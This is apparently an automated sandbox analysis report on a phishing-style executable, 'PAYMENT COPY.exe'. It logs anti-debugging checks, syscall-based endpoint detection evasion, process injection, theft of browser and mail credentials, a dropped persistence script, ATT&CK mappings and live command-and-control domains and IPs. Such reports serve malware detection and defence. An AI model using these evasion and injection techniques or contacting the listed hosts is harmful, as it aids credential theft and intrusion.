                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0104CA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0104CA72 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FCCB7E mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_010A4A80 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01008A90 mov edx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01026ACC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01004AD0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01004AD0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FFEB20 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FFEB20 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100AAEE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100AAEE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01088D10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01088D10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01004D1D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01058D20 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FCCCC8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FF8CB1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01068D6B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FC8C8D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01006DA0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01098DAE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01098DAE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_010A4DAD mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FDAC50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FD6C50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CDB1 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CDB1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CDB1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01054DD7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01054DD7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FCEC20 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01070DF0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01070DF0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FE0C00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_0100CC00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_00FC6DF6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Code function: 1_2_01054C0F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtSetInformationThread: Direct from: 0x77D263F9
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQueryInformationToken: Direct from: 0x77D32CAC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtCreateFile: Direct from: 0x77D32FEC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtOpenFile: Direct from: 0x77D32DCC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtSetInformationProcess: Direct from: 0x77D32C5C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtProtectVirtualMemory: Direct from: 0x77D32F9C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtOpenKeyEx: Direct from: 0x77D32B9C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtResumeThread: Direct from: 0x77D336AC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtMapViewOfSection: Direct from: 0x77D32D1C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtWriteVirtualMemory: Direct from: 0x77D32E3C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtCreateMutant: Direct from: 0x77D335CC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtNotifyChangeKey: Direct from: 0x77D33C2C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQuerySystemInformation: Direct from: 0x77D32DFC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtReadFile: Direct from: 0x77D32ADC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtAllocateVirtualMemory: Direct from: 0x77D32BFC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtCreateUserProcess: Direct from: 0x77D3371C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQueryInformationProcess: Direct from: 0x77D32C26
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtResumeThread: Direct from: 0x77D32FBC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtDelayExecution: Direct from: 0x77D32DDC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQueryAttributesFile: Direct from: 0x77D32E6C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtSetInformationThread: Direct from: 0x77D32B4C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtReadVirtualMemory: Direct from: 0x77D32E8C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtCreateKey: Direct from: 0x77D32C6C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtClose: Direct from: 0x77D32B6C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtAllocateVirtualMemory: Direct from: 0x77D33C9C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtWriteVirtualMemory: Direct from: 0x77D3490C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtOpenSection: Direct from: 0x77D32E0C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQueryVolumeInformationFile: Direct from: 0x77D32F2C
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtTerminateThread: Direct from: 0x77D27B2E
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtAllocateVirtualMemory: Direct from: 0x77D348EC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtAllocateVirtualMemory: Direct from: 0x77D32BEC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtDeviceIoControlFile: Direct from: 0x77D32AEC
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; NtQuerySystemInformation: Direct from: 0x77D348CC
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Memory written: C:\Users\user\AppData\Roaming\HashSize.exe base: 500000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Section loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: read write
                      Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                      Source: C:\Windows\SysWOW64\finger.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\finger.exe; Thread register set: target process: 6768
                      Source: C:\Windows\SysWOW64\finger.exe; Thread APC queued: target process: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Process created: C:\Users\user\Desktop\PAYMENT COPY.exe "C:\Users\user\Desktop\PAYMENT COPY.exe"
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe; Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                      Source: C:\Windows\SysWOW64\finger.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Program Manager
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                      Source: BMYdhGJqo1.exe, 00000003.00000002.3350601781.0000000001261000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000000.1079761022.0000000001260000.00000002.00000001.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3351219355.00000000010D1000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Queries volume information: C:\Users\user\Desktop\PAYMENT COPY.exe VolumeInformation
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Queries volume information: C:\Users\user\AppData\Roaming\HashSize.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match; File source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\finger.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\finger.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara match; File source: 1.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000004.00000002.3348154175.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.3352771061.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000004.00000002.3351872954.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1159249310.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000003.00000002.3351350564.0000000003320000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1158626557.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000008.00000002.3351843666.0000000002610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.1162118891.0000000001CF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      MITRE ATT&CK Matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The grid did not survive extraction; the techniques the report marks for this sample, with the marker digits the report prints beside each cell, are (a technique listed once may occupy several tactic columns, e.g. Scheduled Task/Job under Execution, Persistence and Privilege Escalation):
                      • Scripting (111)
                      • Scheduled Task/Job (1)
                      • Abuse Elevation Control Mechanism (1)
                      • Disable or Modify Tools (1)
                      • OS Credential Dumping (1)
                      • File and Directory Discovery (3)
                      • Archive Collected Data (11)
                      • Ingress Tool Transfer (3)
                      • DLL Side-Loading (1)
                      • Deobfuscate/Decode Files or Information (11)
                      • System Information Discovery (113)
                      • Data from Local System (1)
                      • Encrypted Channel (1)
                      • Process Injection (412)
                      • Security Software Discovery (321)
                      • Email Collection (1)
                      • Non-Application Layer Protocol (4)
                      • Registry Run Keys / Startup Folder (2)
                      • Obfuscated Files or Information (3)
                      • Virtualization/Sandbox Evasion (3)
                      • Application Layer Protocol (4)
                      • Software Packing (1)
                      • Process Discovery (2)
                      • Application Window Discovery (1)
                      • Masquerading (1)
                      Behavior Graph (ID: 1635000, Sample: PAYMENT COPY.exe, Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100). The graph image did not survive extraction; the nodes and edges recoverable from its text are:
                      • Start node: contacts www.splogi.xyz, www.moonavatar.xyz and 18 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 11 other signatures. Starts PAYMENT COPY.exe and wscript.exe.
                      • www.moonavatar.xyz: Performs DNS queries to domains with low reputation.
                      • PAYMENT COPY.exe: contacts 196.251.83.222 (ports 49683, 49689, 80; SONIC-WirelessZA, Seychelles); drops C:\Users\user\AppData\Roaming\HashSize.exe (PE32), C:\Users\user\AppData\...\HashSize.vbs (ASCII) and C:\Users\...\HashSize.exe:Zone.Identifier (ASCII); signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function). Starts a second PAYMENT COPY.exe.
                      • wscript.exe: Windows Scripting host queries suspicious COM object (likely to drop second stage). Starts HashSize.exe.
                      • PAYMENT COPY.exe (child): Maps a DLL or memory area into another process. Injects into BMYdhGJqo1.exe.
                      • HashSize.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes. Starts a second HashSize.exe.
                      • BMYdhGJqo1.exe (injected from PAYMENT COPY.exe): Found direct / indirect Syscall (likely to bypass EDR). Starts finger.exe.
                      • finger.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into BMYdhGJqo1.exe and starts firefox.exe.
                      • BMYdhGJqo1.exe (injected from finger.exe): contacts an05-prod-v.cdn-ng.net 103.42.144.24 (ports 58078, 58079, 58080; WSN-TW-NET-ASWorldstarNetworkTW, Taiwan; Republic of China (ROC)), www.xiongding.tech 111.119.219.195 (ports 58110, 58111, 58112; SIPL-ASSysconInfowayPvtLtdIN, India) and 8 other IPs or domains; signature: Found direct / indirect Syscall (likely to bypass EDR).
